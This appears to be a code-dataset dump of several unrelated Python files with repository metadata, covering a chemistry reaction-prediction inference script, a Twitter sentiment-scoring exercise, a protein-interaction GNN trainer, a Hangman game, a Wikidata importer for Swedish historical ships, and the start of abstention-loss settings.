h = g_atom.ggnngwm(f_atoms, f_bonds, super_node_x)
h = g_atom.mlp(h)[:, :, 0]
atoms_record = cp.argsort(functions.sigmoid(h).array + mask_reagents)[:, -10:]
action_step_n = action.shape[1] - 1
m = mask_pair_select.reshape(20, 10 * 10)
pairs_record = cp.zeros((20, action_step_n, 2))
stops_record = cp.zeros((20, action_step_n)).astype('float32')
actions_record = cp.zeros((20, action_step_n)).astype('float32')
# step-wise
for step in range(action_step_n):
# select one pair
h = g_pair.ggnngwm(f_atoms, f_bonds, super_node_x)
f = cp.zeros((20, 10, 100)).astype('float32')
for i in range(20):
f[i] = h[i][atoms_record[i]].array
f = functions.broadcast_to(functions.expand_dims(f, axis=2),
(20, 10, 10, 100)) + \
functions.broadcast_to(functions.expand_dims(f, axis=1),
(20, 10, 10, 100))
f = g_pair.mlp(f.reshape(20, 10 * 10, 100))[:, :, 0]
f = f + (m - 1.) * 1e10
pairs_idx = cp.argmax(functions.softmax(f).array, axis=1)
m[cp.arange(20), pairs_idx] = 0
pairs_i = (pairs_idx / 10).astype('int32')
pairs_j = (pairs_idx % 10).astype('int32')
atoms_i = atoms_record[cp.arange(20), pairs_i]
atoms_j = atoms_record[cp.arange(20), pairs_j]
pairs_record[:, step, 0] = atoms_i
pairs_record[:, step, 1] = atoms_j
# predict the pair of that pair
h = g_action.ggnngwm(f_atoms, f_bonds, super_node_x)
h = h[cp.arange(20), atoms_i] + h[cp.arange(20), atoms_j]
h = h.reshape(20, 1, 100)
h = g_action.mlp(h)[:, 0, :]
actions_record[:, step] = cp.argmax(functions.softmax(h).array, axis=1)
# exec the predicted action
for i in range(20):
if 1. in stops_record[i, :]:
continue
else:
f_bonds[i, :4, atoms_i[i], atoms_j[i]] = 0.0
f_bonds[i, :4, atoms_j[i], atoms_i[i]] = 0.0
f_bonds[i, 4, atoms_i[i], atoms_j[i]] = 1.0
f_bonds[i, 4, atoms_j[i], atoms_i[i]] = 1.0
ac = actions_record[i, step]
if ac != 0.:
f_bonds[i, int(ac - 1), atoms_i[i], atoms_j[i]] = 1.0
f_bonds[i, int(ac - 1), atoms_j[i], atoms_i[i]] = 1.0
# predict stop signal using the updated graph
h = g_stop.ggnngwm(f_atoms, f_bonds, super_node_x)
h = g_stop.mlp(h[cp.arange(20), stop_idx[:, 0]].reshape(20, 1, h.shape[2]))[:, 0, :]
stops_record[:, step] = cp.argmax(functions.softmax(h).array, axis=1)
# record the result by batch
record(atoms_record, pairs_record, actions_record, stops_record, sample_index, data_raw, name)
if __name__ == '__main__':
import chainer
from chainer import serializers
from chainer.iterators import SerialIterator
from chainer_chemistry.dataset.converters import concat_mols
from dataset import uspto_dataset
from models.nn import ggnngwm_stop_step, ggnngwm_atom, ggnngwm_pair_step, ggnngwn_action_step
import logging
import argparse
from distutils.util import strtobool
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser(description='')
parser.add_argument('--hdim', type=int, default=100)
parser.add_argument('--n_layers', type=int, default=3)
parser.add_argument('--nn_hidden_dim', type=int, default=50)
parser.add_argument('--concat_hidden', type=strtobool, default='false')
parser.add_argument('--weight_tying', type=strtobool, default='false')
parser.add_argument('--gwm', type=strtobool, default='true')
parser.add_argument('--topK', type=int, default=10)
parser.add_argument('--g_stop', default='inference/snapshot_stop')
parser.add_argument('--g_atom', default='inference/snapshot_atom')
parser.add_argument('--g_pair', default='inference/snapshot_pair')
parser.add_argument('--g_action', default='inference/snapshot_action')
parser.add_argument('--test_path', default='dataset/test.txt.proc')
parser.add_argument('--out', default='result_all/inference1')
args = parser.parse_args()
g_stop = ggnngwm_stop_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
nn_hidden_dim=args.nn_hidden_dim,
gwm=args.gwm)
chainer.serializers.load_npz(args.g_stop, g_stop)
g_atom = ggnngwm_atom(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
nn_hidden_dim=args.nn_hidden_dim,
gwm=args.gwm,
topK=args.topK)
chainer.serializers.load_npz(args.g_atom, g_atom)
g_pair = ggnngwm_pair_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
nn_hidden_dim=args.nn_hidden_dim,
gwm=args.gwm,
topK=args.topK)
chainer.serializers.load_npz(args.g_pair, g_pair)
g_action = ggnngwn_action_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
nn_hidden_dim=args.nn_hidden_dim,
gwm=args.gwm)
chainer.serializers.load_npz(args.g_action, g_action)
# chainer.cuda.get_device_from_id(0).use()
# g_stop.to_gpu()
valid_raw = uspto_dataset.read_data(args.test_path)
valid_dataset = uspto_dataset.USPTO_dataset(valid_raw)
valid_iter = SerialIterator(valid_dataset, 20, repeat=False, shuffle=False)
one_part_acc = []
for batch in valid_iter:
# get one batch of test data
f_atoms, f_bonds, super_node_x, \
atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select, \
action, step_num, \
stop_idx, \
sample_index = concat_mols(batch, device=-1)
atom_label -= 1
mask_reagents -= 2
mask_reactants_reagents -= 2
action -= 1
with chainer.using_config('train', False):
inference(g_stop, g_atom, g_pair, g_action,
f_atoms, f_bonds, super_node_x,
atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select,
action, step_num,
stop_idx,
sample_index, valid_raw, args.out)
| 3,637 | 0 | 46 |
cc05b3e4955027c6c9972e20b8dc759e2042c97c | 2,224 | py | Python | coursera_course_2.py | pandeyxamit/Coursera-Project-1 | a84ce3c036697016b4c83357a1743aefeda8928d | [
"MIT"
] | null | null | null | coursera_course_2.py | pandeyxamit/Coursera-Project-1 | a84ce3c036697016b4c83357a1743aefeda8928d | [
"MIT"
] | null | null | null | coursera_course_2.py | pandeyxamit/Coursera-Project-1 | a84ce3c036697016b4c83357a1743aefeda8928d | [
"MIT"
] | null | null | null | input_file = open("D:/My Files/Projects/Python Programming/coursera_course_2/files/project_twitter_data.csv","r")
output_file = open("D:/My Files/Projects/Python Programming/coursera_course_2/files/resulting_data.csv","w")
punctuation_chars = ["'", '"', ",", ".", "!", ":", ";", '#', '@']
# lists of words to use
positive_words = []
with open("D:/My Files/Projects/Python Programming/coursera_course_2/files/positive_words.txt") as pos_f:
for lin in pos_f:
if lin[0] != ';' and lin[0] != '\n':
positive_words.append(lin.strip())
negative_words = []
with open("D:/My Files/Projects/Python Programming/coursera_course_2/files/negative_words.txt") as pos_f:
for lin in pos_f:
if lin[0] != ';' and lin[0] != '\n':
negative_words.append(lin.strip())
write_file(output_file)
input_file.close()
output_file.close()
| 38.344828 | 144 | 0.597572 | input_file = open("D:/My Files/Projects/Python Programming/coursera_course_2/files/project_twitter_data.csv","r")
output_file = open("D:/My Files/Projects/Python Programming/coursera_course_2/files/resulting_data.csv","w")
punctuation_chars = ["'", '"', ",", ".", "!", ":", ";", '#', '@']
# lists of words to use
def strip_punctuation(string):
for char in punctuation_chars:
string = string.replace(char, "")
return string
positive_words = []
with open("D:/My Files/Projects/Python Programming/coursera_course_2/files/positive_words.txt") as pos_f:
for lin in pos_f:
if lin[0] != ';' and lin[0] != '\n':
positive_words.append(lin.strip())
def get_pos(str_sentence):
str_sentence = strip_punctuation(str_sentence.lower())
lst_str_sentence = str_sentence.split()
count=0
for word in lst_str_sentence:
for pos_word in positive_words:
if pos_word == word:
count+=1
return count
negative_words = []
with open("D:/My Files/Projects/Python Programming/coursera_course_2/files/negative_words.txt") as pos_f:
for lin in pos_f:
if lin[0] != ';' and lin[0] != '\n':
negative_words.append(lin.strip())
def get_neg(str_sentence):
str_sentence = strip_punctuation(str_sentence.lower())
lst_str_sentence = str_sentence.split()
count=0
for word in lst_str_sentence:
for neg_word in negative_words:
if neg_word == word:
count+=1
return count
def write_file(output_file):
output_file.write("Number of Retweets, Number of Replies, Positive Score, Negative Score, Net Score")
output_file.write("\n")
lines = input_file.readlines()
header= lines.pop(0)
for line in lines:
lst = line.strip().split(',')
output_file.write("{}, {}, {}, {}, {}".format(lst[1], lst[2], get_pos(lst[0]), get_neg(lst[0]), (get_pos(lst[0])-get_neg(lst[0]))))
output_file.write("\n")
write_file(output_file)
input_file.close()
output_file.close()
| 1,203 | 0 | 134 |
3666628927fca94522490c094abbba1ff31c089f | 10,667 | py | Python | src/benchmark/GNN_PPI/gnn_train.py | zjunlp/OntoProtein | 74e46a8a86bce07c089f29c0ac7c55a76e1f5230 | [
"MIT"
] | 42 | 2022-01-28T11:32:40.000Z | 2022-03-28T13:20:01.000Z | src/benchmark/GNN_PPI/gnn_train.py | zjunlp/OntoProtein | 74e46a8a86bce07c089f29c0ac7c55a76e1f5230 | [
"MIT"
] | 2 | 2022-02-02T15:48:34.000Z | 2022-03-25T07:49:23.000Z | src/benchmark/GNN_PPI/gnn_train.py | zjunlp/OntoProtein | 74e46a8a86bce07c089f29c0ac7c55a76e1f5230 | [
"MIT"
] | 9 | 2022-01-21T06:21:49.000Z | 2022-03-24T05:16:52.000Z | import os
import time
import math
import random
import numpy as np
import argparse
import torch
import torch.nn as nn
from yaml import parse
from gnn_data import GNN_DATA
from gnn_model import GIN_Net2, GIN_Net3
from utils import Metrictor_PPI, print_file
from tensorboardX import SummaryWriter
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
parser = argparse.ArgumentParser(description='Train Model')
parser.add_argument('--description', default=None, type=str,
help='train description')
parser.add_argument('--ppi_path', default=None, type=str,
help="ppi path")
parser.add_argument('--pseq_path', default=None, type=str,
help="protein sequence path")
parser.add_argument('--vec_path', default=None, type=str,
help='protein sequence vector path')
parser.add_argument('--split_new', default=None, type=boolean_string,
help='split new index file or not')
parser.add_argument('--split_mode', default=None, type=str,
help='split method, random, bfs or dfs')
parser.add_argument('--train_valid_index_path', default=None, type=str,
help='cnn_rnn and gnn unified train and valid ppi index')
parser.add_argument('--use_lr_scheduler', default=None, type=boolean_string,
help="train use learning rate scheduler or not")
parser.add_argument('--save_path', default=None, type=str,
help='model save path')
parser.add_argument('--graph_only_train', default=None, type=boolean_string,
help='train ppi graph conctruct by train or all(train with test)')
parser.add_argument('--batch_size', default=None, type=int,
help="gnn train batch size, edge batch size")
parser.add_argument('--lr', default=1e-3, type=float)
parser.add_argument('--epochs', default=None, type=int,
help='train epoch number')
if __name__ == "__main__":
main() | 39.802239 | 206 | 0.630449 | import os
import time
import math
import random
import numpy as np
import argparse
import torch
import torch.nn as nn
from yaml import parse
from gnn_data import GNN_DATA
from gnn_model import GIN_Net2, GIN_Net3
from utils import Metrictor_PPI, print_file
from tensorboardX import SummaryWriter
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
def boolean_string(s):
if s not in {'False', 'True'}:
raise ValueError('Not a valid boolean string')
return s == 'True'
parser = argparse.ArgumentParser(description='Train Model')
parser.add_argument('--description', default=None, type=str,
help='train description')
parser.add_argument('--ppi_path', default=None, type=str,
help="ppi path")
parser.add_argument('--pseq_path', default=None, type=str,
help="protein sequence path")
parser.add_argument('--vec_path', default=None, type=str,
help='protein sequence vector path')
parser.add_argument('--split_new', default=None, type=boolean_string,
help='split new index file or not')
parser.add_argument('--split_mode', default=None, type=str,
help='split method, random, bfs or dfs')
parser.add_argument('--train_valid_index_path', default=None, type=str,
help='cnn_rnn and gnn unified train and valid ppi index')
parser.add_argument('--use_lr_scheduler', default=None, type=boolean_string,
help="train use learning rate scheduler or not")
parser.add_argument('--save_path', default=None, type=str,
help='model save path')
parser.add_argument('--graph_only_train', default=None, type=boolean_string,
help='train ppi graph conctruct by train or all(train with test)')
parser.add_argument('--batch_size', default=None, type=int,
help="gnn train batch size, edge batch size")
parser.add_argument('--lr', default=1e-3, type=float)
parser.add_argument('--epochs', default=None, type=int,
help='train epoch number')
def train(model, graph, ppi_list, loss_fn, optimizer, device,
result_file_path, summary_writer, save_path,
batch_size=512, epochs=1000, scheduler=None,
got=False):
global_step = 0
global_best_valid_f1 = 0.0
global_best_valid_f1_epoch = 0
truth_edge_num = graph.edge_index.shape[1] // 2
for epoch in range(epochs):
recall_sum = 0.0
precision_sum = 0.0
f1_sum = 0.0
loss_sum = 0.0
steps = math.ceil(len(graph.train_mask) / batch_size)
model.train()
random.shuffle(graph.train_mask)
random.shuffle(graph.train_mask_got)
for step in range(steps):
if step == steps-1:
if got:
train_edge_id = graph.train_mask_got[step*batch_size:]
else:
train_edge_id = graph.train_mask[step*batch_size:]
else:
if got:
train_edge_id = graph.train_mask_got[step*batch_size : step*batch_size + batch_size]
else:
train_edge_id = graph.train_mask[step*batch_size : step*batch_size + batch_size]
if got:
output = model(graph.x, graph.edge_index_got, train_edge_id)
label = graph.edge_attr_got[train_edge_id]
else:
output = model(graph.x, graph.edge_index, train_edge_id)
label = graph.edge_attr_1[train_edge_id]
label = label.type(torch.FloatTensor).to(device)
loss = loss_fn(output, label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
m = nn.Sigmoid()
pre_result = (m(output) > 0.5).type(torch.FloatTensor).to(device)
metrics = Metrictor_PPI(pre_result.cpu().data, label.cpu().data)
metrics.show_result()
recall_sum += metrics.Recall
precision_sum += metrics.Precision
f1_sum += metrics.F1
loss_sum += loss.item()
summary_writer.add_scalar('train/loss', loss.item(), global_step)
summary_writer.add_scalar('train/precision', metrics.Precision, global_step)
summary_writer.add_scalar('train/recall', metrics.Recall, global_step)
summary_writer.add_scalar('train/F1', metrics.F1, global_step)
global_step += 1
print_file("epoch: {}, step: {}, Train: label_loss: {}, precision: {}, recall: {}, f1: {}"
.format(epoch, step, loss.item(), metrics.Precision, metrics.Recall, metrics.F1))
torch.save({'epoch': epoch,
'state_dict': model.state_dict()},
os.path.join(save_path, 'gnn_model_train.ckpt'))
valid_pre_result_list = []
valid_label_list = []
valid_loss_sum = 0.0
model.eval()
valid_steps = math.ceil(len(graph.val_mask) / batch_size)
with torch.no_grad():
for step in range(valid_steps):
if step == valid_steps-1:
valid_edge_id = graph.val_mask[step*batch_size:]
else:
valid_edge_id = graph.val_mask[step*batch_size : step*batch_size + batch_size]
output = model(graph.x, graph.edge_index, valid_edge_id)
label = graph.edge_attr_1[valid_edge_id]
label = label.type(torch.FloatTensor).to(device)
loss = loss_fn(output, label)
valid_loss_sum += loss.item()
m = nn.Sigmoid()
pre_result = (m(output) > 0.5).type(torch.FloatTensor).to(device)
valid_pre_result_list.append(pre_result.cpu().data)
valid_label_list.append(label.cpu().data)
valid_pre_result_list = torch.cat(valid_pre_result_list, dim=0)
valid_label_list = torch.cat(valid_label_list, dim=0)
metrics = Metrictor_PPI(valid_pre_result_list, valid_label_list)
metrics.show_result()
recall = recall_sum / steps
precision = precision_sum / steps
f1 = f1_sum / steps
loss = loss_sum / steps
valid_loss = valid_loss_sum / valid_steps
if scheduler != None:
scheduler.step(loss)
print_file("epoch: {}, now learning rate: {}".format(epoch, scheduler.optimizer.param_groups[0]['lr']), save_file_path=result_file_path)
if global_best_valid_f1 < metrics.F1:
global_best_valid_f1 = metrics.F1
global_best_valid_f1_epoch = epoch
torch.save({'epoch': epoch,
'state_dict': model.state_dict()},
os.path.join(save_path, 'gnn_model_valid_best.ckpt'))
summary_writer.add_scalar('valid/precision', metrics.Precision, global_step)
summary_writer.add_scalar('valid/recall', metrics.Recall, global_step)
summary_writer.add_scalar('valid/F1', metrics.F1, global_step)
summary_writer.add_scalar('valid/loss', valid_loss, global_step)
print_file("epoch: {}, Training_avg: label_loss: {}, recall: {}, precision: {}, F1: {}, Validation_avg: loss: {}, recall: {}, precision: {}, F1: {}, Best valid_f1: {}, in {} epoch"
.format(epoch, loss, recall, precision, f1, valid_loss, metrics.Recall, metrics.Precision, metrics.F1, global_best_valid_f1, global_best_valid_f1_epoch), save_file_path=result_file_path)
def main():
args = parser.parse_args()
ppi_data = GNN_DATA(ppi_path=args.ppi_path)
print("use_get_feature_origin")
ppi_data.get_feature_origin(pseq_path=args.pseq_path, vec_path=args.vec_path)
ppi_data.generate_data()
print("----------------------- start split train and valid index -------------------")
print("whether to split new train and valid index file, {}".format(args.split_new))
if args.split_new:
print("use {} method to split".format(args.split_mode))
ppi_data.split_dataset(args.train_valid_index_path, random_new=args.split_new, mode=args.split_mode)
print("----------------------- Done split train and valid index -------------------")
graph = ppi_data.data
print(graph.x.shape)
ppi_list = ppi_data.ppi_list
graph.train_mask = ppi_data.ppi_split_dict['train_index']
graph.val_mask = ppi_data.ppi_split_dict['valid_index']
print("train gnn, train_num: {}, valid_num: {}".format(len(graph.train_mask), len(graph.val_mask)))
graph.edge_index_got = torch.cat((graph.edge_index[:, graph.train_mask], graph.edge_index[:, graph.train_mask][[1, 0]]), dim=1)
graph.edge_attr_got = torch.cat((graph.edge_attr_1[graph.train_mask], graph.edge_attr_1[graph.train_mask]), dim=0)
graph.train_mask_got = [i for i in range(len(graph.train_mask))]
device = torch.device('cuda:7' if torch.cuda.is_available() else 'cpu')
print(device)
graph.to(device)
# model = GIN_Net2(in_len=2000, in_feature=13, gin_in_feature=256, num_layers=1, pool_size=3, cnn_hidden=1).to(device)
model = GIN_Net3(embed_size=1024, gin_in_feature=256, num_layers=1, pool_size=3, cnn_hidden=1).to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=5e-4)
scheduler = None
if args.use_lr_scheduler:
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=20, verbose=True)
loss_fn = nn.BCEWithLogitsLoss().to(device)
if not os.path.exists(args.save_path):
os.mkdir(args.save_path)
time_stamp = time.strftime("%Y-%m-%d %H:%M:%S")
save_path = os.path.join(args.save_path, "gnn_{}_{}".format(args.description, time_stamp))
result_file_path = os.path.join(save_path, "valid_results.txt")
config_path = os.path.join(save_path, "config.txt")
os.mkdir(save_path)
with open(config_path, 'w') as f:
args_dict = args.__dict__
for key in args_dict:
f.write("{} = {}".format(key, args_dict[key]))
f.write('\n')
f.write('\n')
f.write("train gnn, train_num: {}, valid_num: {}".format(len(graph.train_mask), len(graph.val_mask)))
summary_writer = SummaryWriter(save_path)
train(model, graph, ppi_list, loss_fn, optimizer, device,
result_file_path, summary_writer, save_path,
batch_size=args.batch_size, epochs=args.epochs, scheduler=scheduler,
got=args.graph_only_train)
summary_writer.close()
if __name__ == "__main__":
main() | 8,615 | 0 | 69 |
efc366eb57be3992c78c43f0ee2903cbb4b3bdf9 | 3,042 | py | Python | Hangman/Hangman.py | DavBebawy/School-Projects | beeeb3fa219d99f0163f4137f51e02070ba3b6ae | [
"MIT"
] | null | null | null | Hangman/Hangman.py | DavBebawy/School-Projects | beeeb3fa219d99f0163f4137f51e02070ba3b6ae | [
"MIT"
] | null | null | null | Hangman/Hangman.py | DavBebawy/School-Projects | beeeb3fa219d99f0163f4137f51e02070ba3b6ae | [
"MIT"
] | null | null | null | import random
import sys
textfile = "wordlist.txt"
userinput = True
wordcounts = dict()
words = dict()
#Print an error and exit gracefully if wordlist is not found
try:
open(textfile)
except FileNotFoundError:
print(textfile + " not find. Please make sure it exists in current directory.")
sys.exit()
#Open the wordlist.txt and read each line into the dictionary wordcounts in a with the word length as the key
with open(textfile) as infile:
for line in infile:
for word in line.split():
wordcounts.setdefault(len(word),[]).append(word)
print("Welcome to Hangman")
#Ask for user input, check if it's an int bigger than 2 and smaller than the maximum length
while userinput:
wordlength = input("What length word would you like me to choose? ==> ")
try:
int(wordlength)
except ValueError:
print("Input is invalid, please try again")
continue
wordlength = int(wordlength)
words = wordcounts.get(wordlength)
if not words or wordlength < 2:
print("Input is invalid, please try again")
else:
userinput = False
#choose a random word with the specified length
word = random.choice(words)
#create a list of *s with the same length as the chosen word
filled_word = ['*'] * len(word)
guesses_left = 7
#loop: ask for user input for a letter or a word, give and error and try again if not
while guesses_left > 0:
print("\nWord: " + ''.join(filled_word))
print("You have " + str(guesses_left) + " guesses remaining.")
guess = input("Type a letter or a word guess: ")
if not guess.isalpha():
print("Wrong input.\n")
continue
elif len(guess) == 1: #letter guess, check the occurence of the letter, 'reveal' the letter in the word, or if it doesn't exist, decrement guesses_left and restart loop
guess = guess.lower()
index = 0
found = []
while index < len(word):
index = word.find(guess, index)
if index >= 0:
found.append(index)
index += 1
elif len(found) > 0:
print("There is " + str(len(found)) + " " + guess + "!")
break
else:
print("Sorry, there are no " + guess + "'s.")
guesses_left -= 1
break
for x in found:
filled_word[x] = guess
if ''.join(filled_word) == word:
print("\nCongratulations, you guessed it!")
break
else: #word guess, check if the guess matches the word. End the game if guessed correctly, otherwise decrement guesses_left and restart loop
guess = guess.lower()
if guess == word:
print("\nCongratulations, you guessed it!")
break
else:
guesses_left -= 1
print("Sorry, the word is not '" + guess + "'")
if guesses_left == 0: #if the user runs out of guesses, reveal the word
print("\nYou are out of guesses. The word was: " + word)
print("Game Over") | 34.965517 | 172 | 0.611111 | import random
import sys
textfile = "wordlist.txt"
userinput = True
wordcounts = dict()
words = dict()
#Print an error and exit gracefully if wordlist is not found
try:
open(textfile)
except FileNotFoundError:
print(textfile + " not find. Please make sure it exists in current directory.")
sys.exit()
#Open the wordlist.txt and read each line into the dictionary wordcounts in a with the word length as the key
with open(textfile) as infile:
for line in infile:
for word in line.split():
wordcounts.setdefault(len(word),[]).append(word)
print("Welcome to Hangman")
#Ask for user input, check if it's an int bigger than 2 and smaller than the maximum length
while userinput:
wordlength = input("What length word would you like me to choose? ==> ")
try:
int(wordlength)
except ValueError:
print("Input is invalid, please try again")
continue
wordlength = int(wordlength)
words = wordcounts.get(wordlength)
if not words or wordlength < 2:
print("Input is invalid, please try again")
else:
userinput = False
#choose a random word with the specified length
word = random.choice(words)
#create a list of *s with the same length as the chosen word
filled_word = ['*'] * len(word)
guesses_left = 7
#loop: ask for user input for a letter or a word, give and error and try again if not
while guesses_left > 0:
print("\nWord: " + ''.join(filled_word))
print("You have " + str(guesses_left) + " guesses remaining.")
guess = input("Type a letter or a word guess: ")
if not guess.isalpha():
print("Wrong input.\n")
continue
elif len(guess) == 1: #letter guess, check the occurence of the letter, 'reveal' the letter in the word, or if it doesn't exist, decrement guesses_left and restart loop
guess = guess.lower()
index = 0
found = []
while index < len(word):
index = word.find(guess, index)
if index >= 0:
found.append(index)
index += 1
elif len(found) > 0:
print("There is " + str(len(found)) + " " + guess + "!")
break
else:
print("Sorry, there are no " + guess + "'s.")
guesses_left -= 1
break
for x in found:
filled_word[x] = guess
if ''.join(filled_word) == word:
print("\nCongratulations, you guessed it!")
break
else: #word guess, check if the guess matches the word. End the game if guessed correctly, otherwise decrement guesses_left and restart loop
guess = guess.lower()
if guess == word:
print("\nCongratulations, you guessed it!")
break
else:
guesses_left -= 1
print("Sorry, the word is not '" + guess + "'")
if guesses_left == 0: #if the user runs out of guesses, reveal the word
print("\nYou are out of guesses. The word was: " + word)
print("Game Over") | 0 | 0 | 0 |
349c39ae63e190bd17cd57a8d76919c472ac1ee0 | 6,518 | py | Python | importer/SeShipSv.py | Vesihiisi/COH-tools | a874f076cb93b93722efb1be56a66a9380bcb7c4 | [
"MIT"
] | 4 | 2017-01-12T14:43:28.000Z | 2017-09-08T20:29:30.000Z | importer/SeShipSv.py | Vesihiisi/COH-tools | a874f076cb93b93722efb1be56a66a9380bcb7c4 | [
"MIT"
] | 103 | 2017-01-13T13:25:03.000Z | 2018-09-05T12:29:41.000Z | importer/SeShipSv.py | Vesihiisi/COH-tools | a874f076cb93b93722efb1be56a66a9380bcb7c4 | [
"MIT"
] | 2 | 2017-03-23T10:22:54.000Z | 2018-01-08T09:25:03.000Z | from Monument import Monument, Dataset
import importer_utils as utils
import importer as importer
if __name__ == "__main__":
"""Command line entry point for importer."""
args = importer.handle_args()
dataset = Dataset("se-ship", "sv", SeShipSv)
dataset.data_files = {
"functions": "se-ship_(sv)_functions.json"}
importer.main(args, dataset)
| 37.034091 | 100 | 0.574256 | from Monument import Monument, Dataset
import importer_utils as utils
import importer as importer
class SeShipSv(Monument):
def set_type(self):
"""
Set the specific type of watercraft.
In some cases, there's a more specific ship type in
the 'funktion' column.
Here all all the possible values:
https://www.wikidata.org/wiki/Wikidata:WikiProject_WLM/Mapping_tables/se-ship_(sv)/functions
This table is used as the base for mapping.
If there's a mapping for the specific value,
it will substitute the default P31 (watercraft)
"""
table = self.data_files["functions"]["mappings"]
if self.funktion:
special_type = self.funktion.lower()
try:
functions = [table[x]["items"]
for x in table if x.lower() == special_type][0]
if len(functions) > 0:
self.remove_statement("is")
for f in functions:
ref = self.wlm_source
self.add_statement("is", f, refs=[ref])
except IndexError:
self.add_to_report("funktion", self.funktion)
def set_shipyard(self):
"""
Set the manufacturer property.
Process the column 'varv'.
It can look like this:
'[[Bergsunds varv]]<br>[[Stockholm]]'
We only use this if the actual shipyard is
wikilinked, which is not always the case.
Use WLM database as reference.
"""
if self.has_non_empty_attribute("varv"):
possible_varv = self.varv
if "<br>" in possible_varv:
possible_varv = self.varv.split("<br>")[0]
if "[[" in possible_varv:
varv = utils.q_from_first_wikilink("sv", possible_varv)
ref = self.wlm_source
self.add_statement("manufacturer", varv, refs=[ref])
else:
self.add_to_report("varv", self.varv)
def set_manufacture_year(self):
"""
Set the manufacture year.
If the column 'byggar' has a parsable value,
use it as year of manufacture.
Use WLM database as a source.
"""
if self.has_non_empty_attribute("byggar"):
byggar = utils.parse_year(
utils.remove_characters(self.byggar, ".,"))
if isinstance(byggar, int):
ref = self.wlm_source
self.add_statement(
"inception", utils.package_time({"year": byggar}),
refs=[ref])
else:
self.add_to_report("byggår", self.byggar)
def set_dimensions(self):
"""
Parse ship dimensions.
They can look like this:
'Längd: 15.77 Bredd: 5.19 Djup: 1.70 Brt: 15'
If parsing fails, set it to an empty dictionary
and save the input data to the problem report.
Use WLM database as source.
"""
if self.has_non_empty_attribute("dimensioner"):
dimensions_processed = utils.parse_ship_dimensions(
self.dimensioner)
if not dimensions_processed:
self.add_to_report("dimensioner", self.dimensioner)
else:
for dimension, value in dimensions_processed.items():
if dimension in self.props:
ref = self.wlm_source
self.add_statement(
dimension,
utils.package_quantity(
value, self.common_items["metre"]),
refs=[ref])
def set_homeport(self):
"""
Add homeport to data object.
Only works if column 'hemmahamn' contains exactly
one wikilink.
Use WLM database as source.
"""
if self.has_non_empty_attribute("hemmahamn"):
if utils.count_wikilinks(self.hemmahamn) == 1:
home_port = utils.q_from_first_wikilink("sv", self.hemmahamn)
ref = self.wlm_source
self.add_statement("home_port", home_port, refs=[ref])
def set_call_sign(self):
"""
Add call sign to data object.
[https://phabricator.wikimedia.org/T159427]
A few of them are fake
(since identifiers are needed in the WLM database).
These have the shape wiki[0-9][0-9].
Fake ID's are added as P2186 (WLM identifier).
All values: https://phabricator.wikimedia.org/P5010
Use WLM database as source.
"""
if self.has_non_empty_attribute("signal"):
ref = self.wlm_source
if self.signal.startswith("wiki") or self.signal.startswith("Tidigare"):
self.add_statement("wlm_id", self.signal, refs=[ref])
else:
self.add_statement("call_sign", self.signal, refs=[ref])
def set_monuments_all_id(self):
"""Map which column name in specific table to ID in monuments_all."""
self.monuments_all_id = self.signal
def set_descriptions(self):
"""Set default descriptions."""
desc_bases = {"sv": "kulturmärkt bruksfartyg",
"en": "listed historical ship in Sweden"}
for language in ["en", "sv"]:
self.add_description(language, desc_bases[language])
def __init__(self, db_row_dict, mapping, data_files, existing):
Monument.__init__(self, db_row_dict, mapping, data_files, existing)
self.set_monuments_all_id()
self.set_changed()
self.wlm_source = self.create_wlm_source(self.monuments_all_id)
self.set_country()
self.set_is()
self.set_heritage()
self.set_source()
self.set_registrant_url()
self.set_labels("sv", self.namn)
self.set_descriptions()
self.set_image("bild")
self.exists("sv", "artikel")
self.set_type()
self.set_commonscat()
self.set_call_sign()
self.set_manufacture_year()
self.set_shipyard()
self.set_homeport()
self.set_dimensions()
self.exists_with_prop(mapping)
if __name__ == "__main__":
"""Command line entry point for importer."""
args = importer.handle_args()
dataset = Dataset("se-ship", "sv", SeShipSv)
dataset.data_files = {
"functions": "se-ship_(sv)_functions.json"}
importer.main(args, dataset)
| 775 | 5,351 | 23 |
01f86b700d9d0b417557a171a1f8d779a003f6f4 | 6,278 | py | Python | Pilot1/NT3/abstain_functions.py | vgutta/Benchmarks | f739c1fb2b02dd8fb310e2182fa8c4baaaea7caf | [
"MIT"
] | 51 | 2017-01-24T20:57:27.000Z | 2022-02-15T00:33:45.000Z | Pilot1/NT3/abstain_functions.py | vgutta/Benchmarks | f739c1fb2b02dd8fb310e2182fa8c4baaaea7caf | [
"MIT"
] | 59 | 2017-08-21T22:19:44.000Z | 2021-11-01T16:05:35.000Z | Pilot1/NT3/abstain_functions.py | vgutta/Benchmarks | f739c1fb2b02dd8fb310e2182fa8c4baaaea7caf | [
"MIT"
] | 90 | 2016-11-22T03:57:07.000Z | 2022-01-11T04:43:23.000Z | from tensorflow.keras import backend as K
abs_definitions = [
{'name': 'add_class',
'nargs': '+',
'type': int,
'help': 'flag to add abstention (per task)'},
{'name': 'alpha',
'nargs': '+',
'type': float,
'help': 'abstention penalty coefficient (per task)'},
{'name': 'min_acc',
'nargs': '+',
'type': float,
'help': 'minimum accuracy required (per task)'},
{'name': 'max_abs',
'nargs': '+',
'type': float,
'help': 'maximum abstention fraction allowed (per task)'},
{'name': 'alpha_scale_factor',
'nargs': '+',
'type': float,
'help': 'scaling factor for modifying alpha (per task)'},
{'name': 'init_abs_epoch',
'action': 'store',
'type': int,
'help': 'number of epochs to skip before modifying alpha'},
{'name': 'n_iters',
'action': 'store',
'type': int,
'help': 'number of iterations to iterate alpha'},
{'name': 'acc_gain',
'type': float,
